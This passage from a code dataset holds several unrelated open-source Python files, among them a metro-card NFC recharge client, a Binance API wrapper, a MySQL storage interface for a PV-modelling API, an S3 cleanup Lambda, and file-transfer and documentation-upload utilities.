\"DTN_CLIENT_RECHARGE_SERVER_ADDRESS\", \"http://localhost:300'\"\n)\n\n#performs the operation of writing and reading the data in the card\ndef loop():\n\n # Wait for an ISO14443A type card (Mifare, etc.). When one is found\n # 'uid' will be populated with the UID, and uidLength will indicate\n # if the uid is 4 bytes (Mifare Classic) or 7 bytes (Mifare Ultralight)\n success, uid = nfc.readPassiveTargetID(cardbaudrate=pn532.PN532_MIFARE_ISO14443A_106KBPS)\n\n if (success):\n # Display some basic information about the card\n print(\"Found an ISO14443A card\")\n print(\"UID Length: {:d}\".format(len(uid)))\n print(\"UID Value: {}\".format(binascii.hexlify(uid)))\n\n # Make sure this is a Mifare Classic card\n if (len(uid) != 4):\n print(\"Ooops ... this doesn't seem to be a Mifare Classic card!\")\n return\n\n # We probably have a Mifare Classic card ...\n print(\"Seems to be a Mifare Classic card (4 byte UID)\")\n\n\napp = Flask(__name__, template_folder=\".\")\nsock = Sock(app)\nsock.init_app(app)\n\n\navailableNodes = []\n\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n\ndef searchNodeByName(name, nodeSet):\n return [element for element in nodeSet if element[\"name\"] == name] or None\n\n\n@sock.route(\"/ws\")\ndef echo(sock):\n while True:\n data = json.loads(sock.receive())\n\n node = data[\"value\"]\n\n sock.send(\n json.dumps(\n {\n \"type\": \"status\",\n \"value\": \"Fetching the recharges in the selected Metro bus\",\n }\n )\n )\n\n ##fetch recharges from node\n nodeAgentServer = searchNodeByName(node, availableNodes)[0]\n\n recharges = requests.get(nodeAgentServer[\"agentIP\"] + \"/get-recharges\").json()\n\n sock.send(\n json.dumps(\n {\n \"type\": \"status\",\n \"value\": \"Please approach the card into the NFC device...\",\n }\n )\n )\n\n # wait for nfc reader to read\n\n time.sleep(2)\n\n sock.send(\n json.dumps(\n {\n \"type\": \"status\",\n \"value\": \"Updating balance in the card\",\n }\n )\n )\n\n time.sleep(1)\n\n sock.send(\n json.dumps(\n {\n \"type\": \"status-complete\",\n \"value\": \"Balance updated, CARD BALANCE: \",\n }\n )\n )\n\n # download the data into the card\n\n sock.send(\n json.dumps(\n {\n \"type\": \"recharges\",\n \"value\": json.dumps(recharges),\n }\n )\n )\n\n \"\"\" match data.type:\n case \"new-selected-node\":\n sock.send(\n json.dumps(\n {\n \"type\": \"status\",\n \"value\": \"Please approach the card into the NFC device...\",\n }\n )\n ) \"\"\"\n\n # sock.send(data)\n\n\n# TO DO, SET UP SERIAL PORT HEARING\n\n\n@app.route(\"/get-nodes\", methods=[\"GET\"])\ndef getNodes():\n data = requests.get(\"http://localhost:3000/get-nodes\").json()\n\n global availableNodes\n\n availableNodes = data[:]\n\n return availableNodes\n\n\nif __name__ == \"__main__\":\n setup()\n app.run(host=\"0.0.0.0\", port=3001, debug=True)\n # app[\"TEMPLATES_AUTO_RELOAD\"] = True\n","repo_name":"Rulios/dtn-public-transport","sub_path":"metrobus-client/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16935601780","text":"import torch\nimport torch.nn as nn\n\n\nclass Metric(nn.Module):\n def __init__(self):\n super(Metric, self).__init__()\n self.metric = None\n\n def forward(self, pred, target):\n return self.metric(pred, target)\n\n\nclass DiceMetric(nn.Module):\n def __init__(self):\n super(DiceMetric, self).__init__()\n\n def forward(self, pred, target):\n \"\"\"calc dice\n\n Args:\n pred (torch.tensor): (N, H, W)\n target (torch.tensor): (N, H, W)\n\n Returns:\n (torch.tensor): dice\n \"\"\"\n\n pred = pred.float()\n target = target.float()\n smooth = 1e-4\n\n p = torch.sigmoid(pred) > 0.5\n t = target > 0.5\n\n inter = (t*p).sum(dim=2).sum(dim=1).float()\n dim1 = (p).sum(dim=2).sum(dim=1).float()\n dim2 = (t).sum(dim=2).sum(dim=1).float()\n\n coeff = (2 * inter + smooth) / (dim1 + dim2 + smooth)\n dice_total = 1-coeff.sum(dim=0)/coeff.size(0)\n return dice_total\n","repo_name":"gunjunlee/pytorch-YOLO-v1","sub_path":"metric/metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"42075128502","text":"import traceback\nfrom binance.client import Client\nfrom datetime import datetime\nfrom math import log\n\nfrom BL.BinanceWebSocket import BinanceWebSocket\nfrom Common.Binance.AccountInfo import AccountInfo\nfrom Common.Binance.Balance import Balance\nfrom Common.Binance.Trade import Trade\nfrom Common.Binance.Candle import Candle\nfrom Common.Binance.OrderBookTicker import OrderBookTicker\nfrom Common.Binance.PriceTicker import PriceTicker\nfrom Common.Binance.PriceTicker24 import PriceTicker24\nfrom Common.Market import Market\nfrom Common.QcParameters import QcParameters\n\n\nclass BinanceLibrary:\n url_base = \"https://api.binance.com/api/v3/klines?symbol={}&interval={}&limit={}\"\n\n def __init__(self, api_key, api_secret):\n try:\n self.client = Client(api_key, api_secret)\n self.ws = None\n except:\n print(traceback.format_exc())\n\n def exit(self):\n try:\n if self.ws:\n self.ws.exit()\n except:\n print(traceback.format_exc())\n\n def get_candles(self, symbol, interval, limit=500, start_time=None, end_time=None):\n candles = None\n try:\n data = self.client.get_klines(symbol=symbol, interval=interval, limit=limit, startTime=start_time, endTime=end_time)\n candles = [Candle(symbol,interval,*d) for d in data]\n except:\n print(traceback.format_exc())\n return candles\n\n def get_markets(self, quote_assets):\n markets = []\n try:\n symbols = self.client.get_exchange_info()['symbols']\n #print(*symbols,sep='\\n')\n for symbol in symbols:\n if symbol['status'] != 'TRADING':\n continue\n if not quote_assets or (symbol['quoteAsset'] in quote_assets):\n market = Market(Symbol=symbol['symbol'], BaseAsset=symbol['baseAsset'], QuoteAsset=symbol['quoteAsset'])\n if symbol['filters']:\n for filter in symbol['filters']:\n if filter['filterType'] == 'MIN_NOTIONAL':\n market.MinAmountToTrade = float(filter['minNotional'])\n if filter['filterType'] == 'LOT_SIZE':\n market.AmountDecimalDigits = round(-log(float(filter['stepSize']),10))\n market.MinQuantity = float(filter['minQty'])\n markets.append(market)\n except:\n print(traceback.format_exc())\n return markets\n\n def get_account_info(self):\n info = None\n try:\n info = AccountInfo(*self.client.get_account(recvWindow=59000).values())\n except:\n print(traceback.format_exc())\n return info\n\n def get_asset_balance(self, asset):\n balance = None\n try:\n balance = Balance(*self.client.get_asset_balance(asset=asset, recvWindow=59000).values())\n except:\n print(traceback.format_exc())\n return balance\n\n def get_server_time(self):\n server_time = None\n try:\n server_time = int(self.client.get_server_time()[\"serverTime\"])\n except:\n print(traceback.format_exc())\n return server_time\n\n def get_orderbook(self):\n order_book = None\n try:\n order_book = [OrderBookTicker(*ticker) for ticker in self.client.get_orderbook_tickers()]\n except:\n print(traceback.format_exc())\n return order_book\n\n def get_price_ticker(self, symbol):\n price_ticker = None\n try:\n result = self.client.get_symbol_ticker(symbol=symbol)\n price_ticker = PriceTicker(*result.values())\n except:\n print(traceback.format_exc())\n return price_ticker\n\n def get_price_ticker_24(self, symbol):\n price_ticker_24 = None\n try:\n result = self.client.get_ticker(symbol=symbol)\n price_ticker_24 = PriceTicker24(*result.values())\n except:\n print(traceback.format_exc())\n return price_ticker_24\n\n def get_trades(self, symbol):\n trades = None\n try:\n result = self.client.get_my_trades(symbol=symbol, recvWindow=59000)\n trades = [Trade(*trade.values()) for trade in result]\n except:\n print(traceback.format_exc())\n return trades\n\n def buy_asset(self, symbol, amount):\n try:\n return self.client.order_market_buy(\n symbol=symbol,\n quantity=amount, recvWindow=59000)\n except:\n print(traceback.format_exc())\n\n def sell_asset(self, symbol, amount):\n try:\n return self.client.order_market_sell(\n symbol=symbol,\n quantity=amount, recvWindow=59000)\n except:\n print(traceback.format_exc())\n\n def __convert_to_stream_names(self, symbols, interval):\n try:\n stream_names = []\n for symbol in symbols:\n stream_names.append(\"{}@kline_{}\".format(symbol.lower(), interval))\n return stream_names\n except:\n print(traceback.format_exc())\n\n ''' \n input:\n inverval: str\n markets: list of market objects\n '''\n def start_web_socket(self, symbols, interval, callback):\n try:\n print(\"start_web_socket\")\n streams = self.__convert_to_stream_names(symbols, interval)\n self.ws = BinanceWebSocket(self.client)\n self.ws.start(streams, callback)\n except:\n print(traceback.format_exc())\n\n def stop_web_socket(self):\n try:\n if self.ws:\n self.ws.stop()\n except:\n print(traceback.format_exc())\n\n\n","repo_name":"Senior-Develop/SWT-PYQT-APP","sub_path":"BL/BinanceLibrary.py","file_name":"BinanceLibrary.py","file_ext":"py","file_size_in_byte":5818,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"29275005602","text":"\"\"\"\nThis module is used to solve the count_case problem in a string from the\nfunctions and methods homework. This solution uses a for loop and islower\nfunction to count the case of the letters in the sentence\n\"\"\"\n\n# Author: Marvin DaCosta, Created June 27, 2020, Last Modified: June 28, 2020\n\n# YouTube video on how to use collections in python:\n# https://bit.ly/2NBaCV6\n\n# Create a sample string to be used in function\nSAMPLE_STRING = 'Hello Mr. Rogers, how are you this fine Tuesday?'\n\n\n# Create a function to loop through each character in the string\ndef count_loop(the_string):\n \"\"\"\n This function is used to loop through each charcter in the string and\n count each lower and upper case character and then return the count for each\n \"\"\"\n count_u = 0\n count_l = 0\n for case in the_string:\n if case.isupper():\n count_u += 1\n elif case.islower():\n count_l += 1\n return count_l, count_u\n\n\nlower, upper = count_loop(SAMPLE_STRING)\nprint(\"There are\", upper, \"upper case and \", lower, \\\n \"lower case characters in the string\")\n","repo_name":"BornRiot/Python.Udemy.Complete_Python_BootCamp","sub_path":"methods_and_functions/functions_and_methods_hw/count_case.py","file_name":"count_case.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"19951645732","text":"from contextlib import contextmanager\nimport datetime as dt\nfrom functools import partial\nimport json\nfrom typing import List, Callable, Dict, Any, Union, Optional\nfrom uuid import UUID\n\n\nfrom fastapi import Depends, HTTPException\nimport pandas as pd\nimport pymysql\nfrom pymysql import converters\nimport pytz\nfrom sqlalchemy.engine import create_engine # type: ignore\nfrom sqlalchemy.pool import QueuePool # type: ignore\n\n\nfrom . import settings, models, __version__\nfrom .auth import get_user_id\n\n\n# this is faster than using strftime\nTIMEFORMAT = \"'{0.year:04}-{0.month:02}-{0.day:02} {0.hour:02}:{0.minute:02}:{0.second:02}'\" # NOQA\n\n\ndef escape_timestamp(value, mapping=None):\n # adapted from the SolarForecastArbiter API under the above MIT license\n if value.tzinfo is not None:\n return TIMEFORMAT.format(value.tz_convert(\"UTC\"))\n else:\n return TIMEFORMAT.format(value)\n\n\ndef escape_datetime(value, mapping=None):\n # adapted from the SolarForecastArbiter API under the above MIT license\n if value.tzinfo is not None:\n return TIMEFORMAT.format(value.astimezone(dt.timezone.utc))\n else:\n return TIMEFORMAT.format(value)\n\n\ndef convert_datetime_utc(obj):\n # adapted from the SolarForecastArbiter API under the above MIT license\n unlocalized = converters.convert_datetime(obj)\n return pytz.utc.localize(unlocalized)\n\n\ndef _make_sql_connection_partial(\n host=None, port=None, user=None, password=None, database=None\n):\n # adapted from the SolarForecastArbiter API under the above MIT license\n conv = converters.conversions.copy()\n # either convert decimals to floats, or add decimals to schema\n conv[converters.FIELD_TYPE.DECIMAL] = float\n conv[converters.FIELD_TYPE.NEWDECIMAL] = float\n conv[converters.FIELD_TYPE.TIMESTAMP] = convert_datetime_utc\n conv[converters.FIELD_TYPE.DATETIME] = convert_datetime_utc\n conv[converters.FIELD_TYPE.JSON] = json.loads\n conv[UUID] = converters.escape_str\n conv[pd.Timestamp] = escape_timestamp\n conv[dt.datetime] = escape_datetime\n connect_kwargs = {\n \"host\": host or settings.mysql_host,\n \"port\": port or settings.mysql_port,\n \"user\": user or settings.mysql_user,\n \"password\": password or settings.mysql_password,\n \"database\": database or settings.mysql_database,\n \"binary_prefix\": True,\n \"conv\": conv,\n \"use_unicode\": True,\n \"charset\": \"utf8mb4\",\n \"init_command\": \"SET time_zone = '+00:00'\",\n }\n if settings.mysql_use_ssl:\n connect_kwargs[\"ssl\"] = {\"ssl\": True}\n getconn = partial(pymysql.connect, **connect_kwargs)\n return getconn\n\n\nengine = create_engine(\n \"mysql+pymysql://\",\n creator=_make_sql_connection_partial(),\n poolclass=QueuePool,\n pool_recycle=3600,\n pool_pre_ping=True,\n).pool\n\n\ndef ensure_user_exists(f: Callable) -> Callable:\n \"\"\"Decorator that ensures the DB user exists for the current auth0 ID.\n Only necessary on methods that require an existing user like create_*.\n \"\"\"\n\n def wrapper(cls, *args, **kwargs):\n cls.create_user_if_not_exists()\n return f(cls, *args, **kwargs)\n\n return wrapper\n\n\nclass StorageTransactionError(Exception):\n \"\"\"Errors raised in StorageInterface from missing method calls needed\n to complete a transaction\"\"\"\n\n pass\n\n\nclass StorageInterface:\n def __init__(self, user: str = Depends(get_user_id)):\n self.user = user\n self._cursor = None\n self.commit = True\n\n @property\n def cursor(self):\n if self._cursor is None:\n raise AttributeError(\"Cursor is only available within `start_transaction`\")\n return self._cursor\n\n @contextmanager\n def start_transaction(self):\n connection = engine.connect()\n cursor = connection.cursor(cursor=pymysql.cursors.DictCursor)\n self._cursor = cursor\n self._add_job_result_called = False\n self._final_job_status_set = False\n try:\n yield self\n except Exception:\n connection.rollback()\n raise\n else:\n if self.commit:\n connection.commit()\n finally:\n connection.close()\n self._cursor = None\n\n def try_query(self, query, args):\n # adapted from the SolarForecastArbiter API under the above MIT license\n try:\n self.cursor.execute(query, args)\n except (\n pymysql.err.OperationalError,\n pymysql.err.IntegrityError,\n pymysql.err.InternalError,\n pymysql.err.DataError,\n ) as err:\n ecode = err.args[0]\n msg = err.args[1]\n if ecode == 1142:\n raise HTTPException(status_code=404, detail=msg)\n elif ecode == 1062 or ecode == 1348:\n raise HTTPException(status_code=409, detail=msg)\n elif ecode == 3140 or ecode == 1406 or ecode == 1048 or ecode == 1054:\n raise HTTPException(status_code=400, detail=msg)\n else:\n raise\n\n def _call_procedure(\n self,\n procedure_name: str,\n *args,\n with_current_user: bool = True,\n ) -> dict:\n \"\"\"\n Can't user callproc since it doesn't properly use converters.\n Will not handle OUT or INOUT parameters without first setting\n local variables and retrieving from those variables\n \"\"\"\n # adapted from the SolarForecastArbiter API under the above MIT license\n if with_current_user:\n new_args = (self.user, *args)\n else:\n new_args = args\n query = f'CALL {procedure_name}({\",\".join([\"%s\"] * len(new_args))})'\n self.try_query(query, new_args)\n out: dict = self.cursor.fetchall()\n return out\n\n def _call_procedure_for_single(\n self,\n procedure_name: str,\n *args,\n with_current_user: bool = True,\n ) -> dict:\n \"\"\"Wrapper handling try/except logic when a single value is expected\"\"\"\n # adapted from the SolarForecastArbiter API under the above MIT license\n try:\n result: dict = self._call_procedure(\n procedure_name,\n *args,\n with_current_user=with_current_user,\n )[0]\n except IndexError:\n raise HTTPException(status_code=404)\n return result\n\n def create_user_if_not_exists(self) -> str:\n out: str = self._call_procedure_for_single(\"create_user_if_not_exists\")[\n \"user_id\"\n ]\n return out\n\n @ensure_user_exists\n def get_user(self) -> models.UserInfo:\n out = self._call_procedure_for_single(\"get_user\")\n out[\"object_id\"] = out.pop(\"user_id\")\n out[\"object_type\"] = \"user\"\n out[\"modified_at\"] = out[\"created_at\"]\n return models.UserInfo(**out)\n\n def _parse_system(self, sys: Dict[str, Any]) -> models.StoredPVSystem:\n sys[\"object_id\"] = sys.pop(\"system_id\")\n sys[\"object_type\"] = \"system\"\n return models.StoredPVSystem(**sys)\n\n def list_systems(self) -> List[models.StoredPVSystem]:\n systems = self._call_procedure(\"list_systems\")\n out = []\n for sys in systems:\n out.append(self._parse_system(sys))\n return out\n\n @ensure_user_exists\n def create_system(self, system_def: models.PVSystem) -> models.StoredObjectID:\n created = self._call_procedure_for_single(\n \"create_system\", system_def.name, system_def.json()\n )\n return models.StoredObjectID(\n object_id=created[\"system_id\"], object_type=\"system\"\n )\n\n def get_system(self, system_id: UUID) -> models.StoredPVSystem:\n system = self._call_procedure_for_single(\"get_system\", system_id)\n return self._parse_system(system)\n\n def delete_system(self, system_id: UUID):\n self._call_procedure(\"delete_system\", system_id)\n\n def update_system(\n self, system_id: UUID, system_def: models.PVSystem\n ) -> models.StoredObjectID:\n self._call_procedure(\n \"update_system\", system_id, system_def.name, system_def.json()\n )\n return models.StoredObjectID(object_id=system_id, object_type=\"system\")\n\n def get_system_hash(self, system_id: UUID) -> str:\n out: str = self._call_procedure_for_single(\"get_system_hash\", system_id)[\n \"system_hash\"\n ]\n return out\n\n @ensure_user_exists\n def create_system_model_data(self, system_id: UUID, dataset: models.DatasetEnum):\n self._call_procedure(\"create_system_data\", system_id, dataset)\n\n def get_system_model_meta(\n self, system_id: UUID, dataset: models.DatasetEnum\n ) -> models.SystemDataMeta:\n out = self._call_procedure_for_single(\n \"get_system_data_meta\", system_id, dataset\n )\n stored_hash = out.pop(\"system_hash\")\n if stored_hash is not None:\n current_hash = self.get_system_hash(system_id)\n out[\"system_modified\"] = stored_hash.lower() != current_hash\n else:\n out[\"system_modified\"] = False\n # present \"prepared\" status as \"queued\"\n if out[\"status\"] == \"prepared\":\n out[\"status\"] = \"queued\"\n return models.SystemDataMeta(**out)\n\n def update_system_model_data(\n self,\n system_id: UUID,\n dataset: models.DatasetEnum,\n system_hash: str,\n timeseries_data: Optional[bytes],\n statistics: Optional[bytes],\n error: Union[dict, List[dict]] = [],\n ):\n self._call_procedure(\n \"update_system_data\",\n system_id,\n dataset,\n timeseries_data,\n statistics,\n json.dumps(error),\n __version__,\n system_hash,\n )\n\n def get_system_model_timeseries(\n self, system_id: UUID, dataset: models.DatasetEnum\n ) -> bytes:\n res = self._call_procedure_for_single(\n \"get_system_timeseries\", system_id, dataset\n )\n if res[\"timeseries\"] is None:\n raise HTTPException(status_code=404, detail=\"No timeseries data available\")\n out: bytes = res[\"timeseries\"]\n return out\n\n def get_system_model_statistics(\n self, system_id: UUID, dataset: models.DatasetEnum\n ) -> bytes:\n res = self._call_procedure_for_single(\n \"get_system_statistics\", system_id, dataset\n )\n if res[\"statistics\"] is None:\n raise HTTPException(status_code=404, detail=\"No statistics available\")\n out: bytes = res[\"statistics\"]\n return out\n\n @ensure_user_exists\n def create_system_group(self, name: str):\n created = self._call_procedure_for_single(\"create_system_group\", name)\n return models.StoredObjectID(\n object_id=created[\"group_id\"], object_type=\"system_group\"\n )\n\n def update_system_group(self, group_id: UUID, name: str):\n self._call_procedure(\"update_system_group\", group_id, name)\n return models.StoredObjectID(object_id=group_id, object_type=\"system_group\")\n\n def delete_system_group(self, group_id: UUID):\n self._call_procedure(\"delete_system_group\", group_id)\n\n def _parse_system_group(self, group, group_systems=None):\n definition = {\"name\": group.pop(\"name\")}\n if group_systems is not None:\n # systems are an optional field, so that when we're listing\n # groups, we don't have to make so many calls\n systems = [self._parse_system(sys) for sys in group_systems]\n definition[\"systems\"] = systems\n group[\"object_id\"] = group.pop(\"group_id\")\n group[\"object_type\"] = \"system_group\"\n group[\"definition\"] = definition\n return models.StoredSystemGroup(**group)\n\n def get_system_group(self, group_id: UUID):\n group = self._call_procedure_for_single(\"get_system_group\", group_id)\n group_systems = self._call_procedure(\"get_group_systems\", group_id)\n return self._parse_system_group(group, group_systems)\n\n def list_system_groups(self):\n groups = self._call_procedure(\"list_system_groups\")\n out = []\n for group in groups:\n out.append(self._parse_system_group(group))\n return out\n\n def add_system_to_group(self, system_id: UUID, group_id: UUID):\n self._call_procedure(\"add_system_to_group\", system_id, group_id)\n\n def remove_system_from_group(self, system_id: UUID, group_id: UUID):\n self._call_procedure(\"remove_system_from_group\", system_id, group_id)\n\n\nclass ComputeManagementInterface(StorageInterface):\n \"\"\"A special interface to the database (that requires different permissions)\n to list all computations and allow setting a failure message on a computation.\n \"\"\"\n\n def __init__(self):\n self._cursor = None\n self.commit = True\n\n def list_system_data_status(self) -> List[models.ManagementSystemDataStatus]:\n with self.start_transaction() as st:\n res = st._call_procedure(\"list_system_data_status\", with_current_user=False)\n\n def repq(d):\n if d[\"status\"] == \"prepared\":\n d[\"status\"] = \"queued\"\n return d\n\n return [models.ManagementSystemDataStatus(**repq(r)) for r in res]\n\n def report_failure(self, system_id: str, dataset: str, message: str):\n with self.start_transaction() as st:\n st._call_procedure(\n \"report_failure\", system_id, dataset, message, with_current_user=False\n )\n","repo_name":"UARENForecasting/ESPRR","sub_path":"api/esprr_api/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":13563,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"32007001876","text":"import boto3\nimport re\nimport os\n\n\ndef get_s3_client():\n \"\"\"\n Get S3 Client from boto3\n :return:\n \"\"\"\n return boto3.client('s3')\n\n\ndef delete_objects_from_bucket(bucket_name: str, object_keys: list):\n client = get_s3_client()\n print(object_keys)\n client.delete_objects(Bucket=bucket_name, Delete={\"Objects\": [{\"Key\": key} for key in object_keys]})\n\n\ndef find_objects_by_tag(bucket_name: str, key_name: str, value_pattern: str):\n client = get_s3_client()\n paginator = client.get_paginator(\"list_objects_v2\")\n found_keys = []\n for result in paginator.paginate(Bucket=bucket_name):\n bucket_objects = result.get(\"Contents\", [])\n for obj in bucket_objects:\n object_tags = client.get_object_tagging(Bucket=bucket_name, Key=obj[\"Key\"])\n all_tags = object_tags.get(\"TagSet\", [])\n if len(all_tags) > 0 and any(\n tag.get(\"Key\") == key_name and re.match(value_pattern, tag.get(\"Value\")) for tag in all_tags):\n found_keys.append(obj.get(\"Key\"))\n return found_keys\n\n\ndef find_objects_by_metadata(bucket_name: str, key_name: str, value_pattern: str):\n client = get_s3_client()\n paginator = client.get_paginator(\"list_objects_v2\")\n found_keys = []\n for result in paginator.paginate(Bucket=bucket_name):\n bucket_objects = result.get(\"Contents\", [])\n for obj in bucket_objects:\n object_meta_data = client.head_object(Bucket=bucket_name, Key=obj[\"Key\"])\n all_meta_tags = object_meta_data.get(\"Metadata\", [])\n if re.match(value_pattern, all_meta_tags.get(key_name)):\n found_keys.append(obj.get(\"Key\"))\n return found_keys\n\n\ndef handler(event, context):\n \"\"\"\n Lambda Handler to delete objects from bucket using tags and meta data\n :param event:\n :param context:\n :return:\n \"\"\"\n # find objects if their tag key name is user_name and its value contains ch\n delete_keys_tags = find_objects_by_tag(bucket_name=os.environ[\"BUCKET_NAME\"], key_name=\"user_name\",\n value_pattern=\".*ch.*\")\n # find objects if their metadata email has .org at last\n delete_keys_meta = find_objects_by_metadata(bucket_name=os.environ[\"BUCKET_NAME\"], key_name=\"email\",\n value_pattern=\".*\\.org\")\n # delete the objects found above\n\n delete_objects_from_bucket(bucket_name=os.environ[\"BUCKET_NAME\"], object_keys=delete_keys_meta)\n delete_objects_from_bucket(bucket_name=os.environ[\"BUCKET_NAME\"], object_keys=delete_keys_tags)\n return \"Success\"\n\n\nif __name__ == \"__main__\":\n handler(None, None)\n","repo_name":"404shades/RohanIPATrainingAWS","sub_path":"lambda/s3_query_select_delete/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72894649193","text":"\"\"\"Test the logger extension module.\"\"\"\n# pylint: disable=protected-access,redefined-outer-name,unused-variable,invalid-name\nimport importlib\nimport sys\nimport unittest\n\nimport sentry_sdk\nfrom flask import Flask\n\nimport flask_logger\n\nTEST_DSN = 'http://foo:bar@sentry.local/1?timeout=1'\n\n\ndef create_app():\n \"\"\"Create a Flask app for context.\"\"\"\n app = Flask(__name__)\n return app\n\n\nclass TestSentrySdkImport(unittest.TestCase):\n \"\"\"Test logger when sentrysdk isn't installed.\"\"\"\n\n def setUp(self):\n \"\"\"Set up tests.\"\"\"\n # Force flask_logger to load without sentry_sdk in the environment\n sys.modules['sentry_sdk'] = None\n importlib.reload(flask_logger.extension)\n self.app = create_app()\n self.ctx = self.app.app_context()\n self.ctx.push()\n\n def tearDown(self):\n \"\"\"Tear down tests.\"\"\"\n self.ctx.pop()\n # reset any mock loggers at module level\n # pylint: disable=invalid-name\n LOGGERS = {} # noqa\n sys.modules['sentry_sdk'] = sentry_sdk\n # Reload flask logger to restore sys.modules to correct state\n importlib.reload(flask_logger.extension)\n\n def test_log_without_sentrysdk(self):\n \"\"\"Test establishing logger when sentry_sdk isn't installed.\"\"\"\n logger = flask_logger.Logger()\n logger.init_app(self.app)\n with self.assertRaises(Exception) as context:\n logger.error('no_sentry_sdk_logger', 'this will raise an exception', dsn=TEST_DSN)\n self.assertEqual(\n str(context.exception),\n 'If specifying SENTRY_DSN, sentry_sdk must be installed '\n '(pip install flask-logger[Sentry])'\n )\n","repo_name":"bbelyeu/flask-logger","sub_path":"flask_logger/tests/test_sentrysdk_import.py","file_name":"test_sentrysdk_import.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"10787181573","text":"import configparser\nimport os\nimport csv\nfrom typing import Union\n\ndef print_message(message: str, level: int=0) -> None:\n colors = {\n 0: '\\x1b[0m', # DEFAULT (info)\n 1: '\\x1b[1;33m', # YEL (warn)\n 2: '\\x1b[1;31m', # RED (error)\n 3: '\\x1b[1;34m', # BLUE (success)\n }\n print(f\"{colors[level]}{message}{colors[0]}\")\n\ndef print_error(message: str) -> None:\n print_message(message, level=2)\n\ndef print_warning(message: str) -> None:\n print_message(message, level=1)\n\ndef print_success(message: str) -> None:\n print_message(message, level=3)\n\ndef get_config(configfile: str) -> Union[tuple, bool]:\n config = configparser.ConfigParser()\n with open(configfile) as file:\n config.read_file(file)\n if 'remote' in config:\n datauser = config.get('remote', 'datauser')\n serverip = config.get('remote', 'serverip')\n sudo = config.getboolean('remote', 'sudo')\n cachelimit = (config.getfloat('local_cache', 'limit') * 1073741824) # GB to bytes\n return (datauser, serverip, sudo, cachelimit)\n\n print_error(\"ERROR config section expected: remote\")\n return None\n\ndef read_source_dest_csv(filename: str) -> dict:\n source_to_dest = []\n with open(filename, \"r\") as csv_file:\n csv_reader = csv.reader(csv_file)\n for line in csv_reader:\n try:\n source, dest = \"/\" + line[0].strip().strip(\"/\"), \"/\" + line[1].strip().strip(\"/\")\n if source != \"/\" and dest != '/':\n source_to_dest.append((source, dest))\n else:\n print_warning(f\"WARNING: Cannot read line in csv, skipping: {line}\")\n except Exception:\n print_warning(f\"WARNING: Cannot read line in csv, skipping: {line}\")\n\n return source_to_dest\n\ndef create_dir(path: str) -> bool:\n \"\"\"\n Creates a local directory, if it does not exist.\n Returns True upon succes or existence. False otherwise.\n \"\"\"\n try:\n os.makedirs(path, exist_ok=True)\n return True\n except Exception:\n return False\n\ndef write_csv(success: list,\n failure: list,\n successpath: str,\n failurepath: str) -> None:\n with open(successpath, 'w') as out:\n csv_out = csv.writer(out)\n csv_out.writerow(['iRODS', 'local'])\n for row in success:\n csv_out.writerow(row)\n\n print_message(f\"Wrote succesful transfers to {successpath}\")\n\n with open(failurepath, 'w') as out:\n csv_out = csv.writer(out)\n csv_out.writerow(['iRODS', 'local', 'reason'])\n for row in failure:\n csv_out.writerow(row)\n\n print_message(f\"Wrote failed transfers to {failurepath}\")\n","repo_name":"UtrechtUniversity/iBridges-SteppingStone","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31169559055","text":"import json\nimport os\nimport zipfile\n\nimport requests\n\n\nclass Client:\n\n def __init__(self, host, port=None, protocol='https', token=None):\n self.host = host\n self.port = port\n self.token = token\n self.protocol = protocol\n\n @property\n def base_url(self):\n if self.port:\n return f'{self.protocol}://{self.host}:{self.port}'\n else:\n return f'{self.protocol}://{self.host}'\n\n def get_upload_token(self, api_token):\n r = requests.get(f'{self.base_url}/api/auth/token/upload', headers={'Authorization': f'Bearer {api_token}'})\n r.raise_for_status()\n self.token = r.json()['access_token']\n\n @staticmethod\n def create_zipfile(html_path, working_dir=None):\n if working_dir is None:\n working_dir = os.getcwd()\n zip_fname = os.path.join(working_dir, 'docs-upload.zip')\n zipf = zipfile.ZipFile(zip_fname, 'w', zipfile.ZIP_DEFLATED)\n for dirname, _, files in os.walk(html_path):\n for filename in files:\n filepath = os.path.join(dirname, filename)\n zipf.write(filepath, arcname=os.path.relpath(filepath, html_path))\n zipf.close()\n return zip_fname\n\n def upload_zipfile(self, zipfile, name, version, repository, tags=None, ):\n if tags is None:\n tags = list()\n values = json.dumps({'version': version,\n 'name': name,\n 'repository': repository,\n 'tags': tags})\n response = requests.post(f'{self.base_url}/api/docs/upload', data=values,\n headers={'Authorization': f'Bearer {self.token}'})\n response.raise_for_status()\n upload_url = response.content.decode().split('Location: ')[1][:-1]\n response = requests.put(upload_url, files={'documentation': ('docs-upload.zip', open(zipfile, 'rb').read())},\n headers={'Authorization': f'Bearer {self.token}'})\n response.raise_for_status()\n return response\n\n def upload_dir(self, html_path, name, version, repository, tags=None, working_dir=None):\n self.upload_zipfile(self.create_zipfile(html_path, working_dir), name, version, repository, tags)\n","repo_name":"djpugh/docserver","sub_path":"src/docserver/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74070097193","text":"import pandas as pd\nimport json\nimport re\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nimport numpy as np\nimport warnings\nfrom sklearn.model_selection import train_test_split\nimport jsonlines\nfrom 